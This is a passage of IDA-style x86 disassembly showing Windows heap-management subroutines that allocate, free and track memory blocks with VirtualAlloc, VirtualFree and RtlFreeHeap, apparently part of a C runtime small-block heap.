jnb short loc_41EFC3
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41EFE7
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41EFE7
; ---------------------------------------------------------------------------
loc_41EFC3: ; CODE XREF: sub_41EF20+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41EFE7
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41EFE7: ; CODE XREF: sub_41EF20+7D�j
; sub_41EF20+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41F0B5
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_41F021
push 3Fh
pop edi
loc_41F021: ; CODE XREF: sub_41EF20+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41F0A3
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_41F07A
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41F06D
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41F06D: ; CODE XREF: sub_41EF20+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_41F09F
; ---------------------------------------------------------------------------
loc_41F07A: ; CODE XREF: sub_41EF20+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41F090
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41F090: ; CODE XREF: sub_41EF20+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_41F09F: ; CODE XREF: sub_41EF20+158�j
shr edx, cl
or [eax], edx
loc_41F0A3: ; CODE XREF: sub_41EF20+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41F0B8
; ---------------------------------------------------------------------------
loc_41F0B5: ; CODE XREF: sub_41EF20+E5�j
mov edx, [ebp+arg_4]
loc_41F0B8: ; CODE XREF: sub_41EF20+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41F20E
; ---------------------------------------------------------------------------
loc_41F0C7: ; CODE XREF: sub_41EF20+52�j
; sub_41EF20+5C�j
xor eax, eax
jmp loc_41F211
; ---------------------------------------------------------------------------
loc_41F0CE: ; CODE XREF: sub_41EF20+49�j
jge loc_41F20E
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_41F0F9
push 3Fh
pop esi
loc_41F0F9: ; CODE XREF: sub_41EF20+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_41F188
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41F112
push 3Fh
pop esi
loc_41F112: ; CODE XREF: sub_41EF20+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41F161
cmp esi, 20h
jnb short loc_41F13D
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41F15E
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41F15E
; ---------------------------------------------------------------------------
loc_41F13D: ; CODE XREF: sub_41EF20+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41F15E
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41F15E: ; CODE XREF: sub_41EF20+214�j
; sub_41EF20+21B�j ...
mov ebx, [ebp+arg_4]
loc_41F161: ; CODE XREF: sub_41EF20+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41F188
push 3Fh
pop esi
loc_41F188: ; CODE XREF: sub_41EF20+1DD�j
; sub_41EF20+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41F205
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_41F1DC
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41F1CF
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41F1CF: ; CODE XREF: sub_41EF20+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_41F201
; ---------------------------------------------------------------------------
loc_41F1DC: ; CODE XREF: sub_41EF20+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41F1F2
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41F1F2: ; CODE XREF: sub_41EF20+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_41F201: ; CODE XREF: sub_41EF20+2BA�j
shr edx, cl
or [eax], edx
loc_41F205: ; CODE XREF: sub_41EF20+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41F20E: ; CODE XREF: sub_41EF20+1A2�j
; sub_41EF20:loc_41F0CE�j
push 1
pop eax
loc_41F211: ; CODE XREF: sub_41EF20+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EF20 endp
; =============== S U B R O U T I N E =======================================
sub_41F216 proc near ; CODE XREF: sub_41E672+41�p
; sub_41F50E:loc_41F6DD�p
cmp dword_43AE60, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_41F22A
mov esi, offset off_43AE50
jmp short loc_41F247
; ---------------------------------------------------------------------------
loc_41F22A: ; CODE XREF: sub_41F216+B�j
push 2020h
push 0
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_41F353
loc_41F247: ; CODE XREF: sub_41F216+12�j
mov ebp, ds:dword_427064
push 4
push 2000h
push 400000h
push 0
call ebp ; VirtualAlloc
mov edi, eax
test edi, edi
jz loc_41F33C
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; VirtualAlloc
test eax, eax
jz loc_41F32E
mov eax, offset off_43AE50
cmp esi, eax
jnz short loc_41F2A6
cmp off_43AE50, 0
jnz short loc_41F296
mov off_43AE50, eax
loc_41F296: ; CODE XREF: sub_41F216+79�j
cmp off_43AE54, 0
jnz short loc_41F2BB
mov off_43AE54, eax
jmp short loc_41F2BB
; ---------------------------------------------------------------------------
loc_41F2A6: ; CODE XREF: sub_41F216+70�j
mov [esi], eax
mov eax, off_43AE54
mov [esi+4], eax
mov off_43AE54, esi
mov eax, [esi+4]
mov [eax], esi
loc_41F2BB: ; CODE XREF: sub_41F216+87�j
; sub_41F216+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_41F2DD: ; CODE XREF: sub_41F216+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_41F2DD
push ebx
push 0
push edi
call sub_41BF70
add esp, 0Ch
loc_41F306: ; CODE XREF: sub_41F216+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_41F32A
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_41F306
; ---------------------------------------------------------------------------
loc_41F32A: ; CODE XREF: sub_41F216+F7�j
mov eax, esi
jmp short loc_41F355
; ---------------------------------------------------------------------------
loc_41F32E: ; CODE XREF: sub_41F216+63�j
push 8000h
push 0
push edi
call ds:dword_427068 ; VirtualFree
loc_41F33C: ; CODE XREF: sub_41F216+4B�j
cmp esi, offset off_43AE50
jz short loc_41F353
push esi
push 0
push dword_4DD384
call ds:dword_42714C ; RtlFreeHeap
loc_41F353: ; CODE XREF: sub_41F216+2B�j
; sub_41F216+12C�j
xor eax, eax
loc_41F355: ; CODE XREF: sub_41F216+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41F216 endp
; =============== S U B R O U T I N E =======================================
sub_41F35A proc near ; CODE XREF: sub_41F3B0+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call ds:dword_427068 ; VirtualFree
cmp off_43CE70, esi
jnz short loc_41F37F
mov eax, [esi+4]
mov off_43CE70, eax
loc_41F37F: ; CODE XREF: sub_41F35A+1B�j
cmp esi, offset off_43AE50
jz short loc_41F3A7
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push dword_4DD384
call ds:dword_42714C ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F3A7: ; CODE XREF: sub_41F35A+2B�j
or dword_43AE60, 0FFFFFFFFh
pop esi
retn
sub_41F35A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F3B0 proc near ; CODE XREF: sub_41F4C9+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, off_43AE54
push edi
loc_41F3BD: ; CODE XREF: sub_41F3B0+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_41F45B
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_41F3D6: ; CODE XREF: sub_41F3B0+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_41F417
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call ds:dword_427068 ; VirtualFree
test eax, eax
jz short loc_41F417
or dword ptr [edi], 0FFFFFFFFh
dec dword_4DBE40
mov eax, [esi+0Ch]
test eax, eax
jz short loc_41F40C
cmp eax, edi
jbe short loc_41F40F
loc_41F40C: ; CODE XREF: sub_41F3B0+56�j
mov [esi+0Ch], edi
loc_41F40F: ; CODE XREF: sub_41F3B0+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_41F424
loc_41F417: ; CODE XREF: sub_41F3B0+2C�j
; sub_41F3B0+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_41F3D6
loc_41F424: ; CODE XREF: sub_41F3B0+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_41F45B
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_41F45B
push 1
lea eax, [ecx+20h]
pop edx
loc_41F43B: ; CODE XREF: sub_41F3B0+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41F44C
inc edx
add eax, 8
cmp edx, 400h
jl short loc_41F43B
loc_41F44C: ; CODE XREF: sub_41F3B0+8E�j
cmp edx, 400h
jnz short loc_41F45B
push ecx
call sub_41F35A
pop ecx
loc_41F45B: ; CODE XREF: sub_41F3B0+11�j
; sub_41F3B0+7D�j ...
cmp esi, off_43AE54
jz short loc_41F46D
cmp [ebp+arg_0], 0
jg loc_41F3BD
loc_41F46D: ; CODE XREF: sub_41F3B0+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F3B0 endp
; =============== S U B R O U T I N E =======================================
sub_41F472 proc near ; CODE XREF: sub_41BA91+3A�p
; sub_41BBE2+173�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_43AE50
push esi
mov ecx, edx
loc_41F47E: ; CODE XREF: sub_41F472+1C�j
cmp eax, [ecx+10h]
jbe short loc_41F488
cmp eax, [ecx+14h]
jb short loc_41F490
loc_41F488: ; CODE XREF: sub_41F472+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_41F4C5
jmp short loc_41F47E
; ---------------------------------------------------------------------------
loc_41F490: ; CODE XREF: sub_41F472+14�j
test al, 0Fh
jnz short loc_41F4C5
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_41F4C5
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_41F4C5: ; CODE XREF: sub_41F472+1A�j
; sub_41F472+20�j ...
xor eax, eax
pop esi
retn
sub_41F472 endp
; =============== S U B R O U T I N E =======================================
sub_41F4C9 proc near ; CODE XREF: sub_41BA91+4D�p
; sub_41BBE2+1D5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_41F50D
inc dword_4DBE40
cmp dword_4DBE40, 20h
jnz short locret_41F50D
push 10h
call sub_41F3B0
pop ecx
locret_41F50D: ; CODE XREF: sub_41F4C9+2B�j
; sub_41F4C9+3A�j
retn
sub_41F4C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F50E proc near ; CODE XREF: sub_41BBE2+1AC�p
; sub_41BEF3+4A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, off_43CE70
push edi
loc_41F51C: ; CODE XREF: sub_41F50E+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_41F5C7
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_41F581
loc_41F547: ; CODE XREF: sub_41F50E+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_41F56A
cmp [edi+4], ebx
jbe short loc_41F56A
push ebx
push ecx
push eax
call sub_41F716
add esp, 0Ch
test eax, eax
jnz short loc_41F5D9
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_41F56A: ; CODE XREF: sub_41F50E+40�j
; sub_41F50E+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_41F547
jmp short loc_41F584
; ---------------------------------------------------------------------------
loc_41F581: ; CODE XREF: sub_41F50E+37�j
mov ebx, [ebp+arg_0]
loc_41F584: ; CODE XREF: sub_41F50E+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_41F5CA
loc_41F597: ; CODE XREF: sub_41F50E+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_41F5B6
cmp [edi+4], ebx
jbe short loc_41F5B6
push ebx
push eax
push [ebp+var_4]
call sub_41F716
add esp, 0Ch
test eax, eax
jnz short loc_41F5D9
mov [edi+4], ebx
loc_41F5B6: ; CODE XREF: sub_41F50E+8D�j
; sub_41F50E+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_41F597
jmp short loc_41F5CA
; ---------------------------------------------------------------------------
loc_41F5C7: ; CODE XREF: sub_41F50E+14�j
mov ebx, [ebp+arg_0]
loc_41F5CA: ; CODE XREF: sub_41F50E+87�j
; sub_41F50E+B7�j
mov esi, [esi]
cmp esi, off_43CE70
jz short loc_41F5E9
jmp loc_41F51C
; ---------------------------------------------------------------------------
loc_41F5D9: ; CODE XREF: sub_41F50E+54�j
; sub_41F50E+A3�j
mov off_43CE70, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_41F711
; ---------------------------------------------------------------------------
loc_41F5E9: ; CODE XREF: sub_41F50E+C4�j
mov eax, offset off_43AE50
mov edi, eax
loc_41F5F0: ; CODE XREF: sub_41F50E+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_41F5FC
cmp dword ptr [edi+0Ch], 0
jnz short loc_41F608
loc_41F5FC: ; CODE XREF: sub_41F50E+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_41F6DD
jmp short loc_41F5F0
; ---------------------------------------------------------------------------
loc_41F608: ; CODE XREF: sub_41F50E+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_41F637
loc_41F626: ; CODE XREF: sub_41F50E+127�j
cmp [ebp+var_4], 10h
jge short loc_41F637
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41F626
loc_41F637: ; CODE XREF: sub_41F50E+116�j
; sub_41F50E+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call ds:dword_427064 ; VirtualAlloc
cmp eax, esi
jnz loc_41F70F
push 0
push [ebp+var_8]
push esi
call sub_41BF70
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_41F69E
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_41F674: ; CODE XREF: sub_41F50E+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_41F674
loc_41F69E: ; CODE XREF: sub_41F50E+15E�j
mov off_43CE70, edi
lea eax, [edi+2018h]
loc_41F6AA: ; CODE XREF: sub_41F50E+1A8�j
cmp ecx, eax
jnb short loc_41F6BA
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_41F6B8
add ecx, 8
jmp short loc_41F6AA
; ---------------------------------------------------------------------------
loc_41F6B8: ; CODE XREF: sub_41F50E+1A3�j
cmp ecx, eax
loc_41F6BA: ; CODE XREF: sub_41F50E+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_41F711
; ---------------------------------------------------------------------------
loc_41F6DD: ; CODE XREF: sub_41F50E+F2�j
call sub_41F216
test eax, eax
jz short loc_41F70F
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov off_43CE70, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_41F711
; ---------------------------------------------------------------------------
loc_41F70F: ; CODE XREF: sub_41F50E+143�j
; sub_41F50E+1D6�j
xor eax, eax
loc_41F711: ; CODE XREF: sub_41F50E+D6�j
; sub_41F50E+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41F50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F716 proc near ; CODE XREF: sub_41F50E+4A�p
; sub_41F50E+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_41F75B
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_41F74A
add [ecx], edx
sub [ecx+4], edx
jmp short loc_41F753
; ---------------------------------------------------------------------------
loc_41F74A: ; CODE XREF: sub_41F716+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41F753: ; CODE XREF: sub_41F716+32�j
lea eax, [edi+8]
jmp loc_41F829
; ---------------------------------------------------------------------------
loc_41F75B: ; CODE XREF: sub_41F716+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_41F764
mov eax, esi
loc_41F764: ; CODE XREF: sub_41F716+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_41F7AE
loc_41F76B: ; CODE XREF: sub_41F716+96�j
mov bl, [eax]
test bl, bl
jnz short loc_41F7A1
push 1
lea ebx, [eax+1]
pop esi
loc_41F777: ; CODE XREF: sub_41F716+68�j
cmp byte ptr [ebx], 0
jnz short loc_41F780
inc ebx
inc esi
jmp short loc_41F777
; ---------------------------------------------------------------------------
loc_41F780: ; CODE XREF: sub_41F716+64�j
cmp esi, edx
jnb short loc_41F7D2
cmp eax, [ebp+var_4]
jnz short loc_41F78E
mov [ecx+4], esi
jmp short loc_41F79A
; ---------------------------------------------------------------------------
loc_41F78E: ; CODE XREF: sub_41F716+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_41F833
loc_41F79A: ; CODE XREF: sub_41F716+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41F7A6
; ---------------------------------------------------------------------------
loc_41F7A1: ; CODE XREF: sub_41F716+59�j
movzx esi, bl
add eax, esi
loc_41F7A6: ; CODE XREF: sub_41F716+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_41F76B
loc_41F7AE: ; CODE XREF: sub_41F716+53�j
lea esi, [ecx+8]
loc_41F7B1: ; CODE XREF: sub_41F716+EB�j
; sub_41F716+F2�j
cmp esi, edi
jnb short loc_41F833
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_41F833
mov al, [esi]
test al, al
jnz short loc_41F803
push 1
lea ebx, [esi+1]
pop eax
loc_41F7C9: ; CODE XREF: sub_41F716+BA�j
cmp byte ptr [ebx], 0
jnz short loc_41F7F3
inc ebx
inc eax
jmp short loc_41F7C9
; ---------------------------------------------------------------------------
loc_41F7D2: ; CODE XREF: sub_41F716+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41F7E3
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_41F7EC
; ---------------------------------------------------------------------------
loc_41F7E3: ; CODE XREF: sub_41F716+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_41F7EC: ; CODE XREF: sub_41F716+CB�j
mov [eax], dl
add eax, 8
jmp short loc_41F829
; ---------------------------------------------------------------------------
loc_41F7F3: ; CODE XREF: sub_41F716+B6�j
cmp eax, edx
jnb short loc_41F80A
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_41F833
mov esi, ebx
jmp short loc_41F7B1
; ---------------------------------------------------------------------------
loc_41F803: ; CODE XREF: sub_41F716+AB�j
movzx eax, al
add esi, eax
jmp short loc_41F7B1
; ---------------------------------------------------------------------------
loc_41F80A: ; CODE XREF: sub_41F716+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41F81B
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_41F824
; ---------------------------------------------------------------------------
loc_41F81B: ; CODE XREF: sub_41F716+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41F824: ; CODE XREF: sub_41F716+103�j
mov [esi], dl
lea eax, [esi+8]
loc_41F829: ; CODE XREF: sub_41F716+40�j
; sub_41F716+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_41F835
; ---------------------------------------------------------------------------
loc_41F833: ; CODE XREF: sub_41F716+7E�j
; sub_41F716+9D�j ...
xor eax, eax
loc_41F835: ; CODE XREF: sub_41F716+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F716 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F83A proc near ; CODE XREF: sub_41BBE2+19A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_41F874
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_41F8D4
; ---------------------------------------------------------------------------
loc_41F874: ; CODE XREF: sub_41F83A+26�j
jnb short loc_41F8DB
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_41F8DB
lea eax, [ecx+edx]
loc_41F889: ; CODE XREF: sub_41F83A+59�j
cmp eax, esi
jnb short loc_41F897
cmp byte ptr [eax], 0
jnz short loc_41F895
inc eax
jmp short loc_41F889
; ---------------------------------------------------------------------------
loc_41F895: ; CODE XREF: sub_41F83A+56�j
cmp eax, esi
loc_41F897: ; CODE XREF: sub_41F83A+51�j
jnz short loc_41F8DB
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_41F8CF
cmp esi, eax
jbe short loc_41F8CF
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_41F8C6
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_41F8C1
loc_41F8BA: ; CODE XREF: sub_41F83A+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_41F8BA
loc_41F8C1: ; CODE XREF: sub_41F83A+7E�j
mov [ebx+4], eax
jmp short loc_41F8CF
; ---------------------------------------------------------------------------
loc_41F8C6: ; CODE XREF: sub_41F83A+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_41F8CF: ; CODE XREF: sub_41F83A+68�j
; sub_41F83A+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_41F8D4: ; CODE XREF: sub_41F83A+38�j
mov [ebp+var_4], 1
loc_41F8DB: ; CODE XREF: sub_41F83A:loc_41F874�j
; sub_41F83A+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41F83A endp
; =============== S U B R O U T I N E =======================================
sub_41F8E3 proc near ; CODE XREF: sub_41BAFA+A9�p
; sub_41C52F+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41F9B7
test al, 40h
jnz loc_41F9B7
test al, 2
jz short loc_41F909
or al, 20h
mov [esi+0Ch], eax
jmp loc_41F9B7
; ---------------------------------------------------------------------------
loc_41F909: ; CODE XREF: sub_41F8E3+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41F91D
push esi
call sub_4241F7
pop ecx
jmp short loc_41F922
; ---------------------------------------------------------------------------
loc_41F91D: ; CODE XREF: sub_41F8E3+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41F922: ; CODE XREF: sub_41F8E3+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41F9BC
add esp, 0Ch
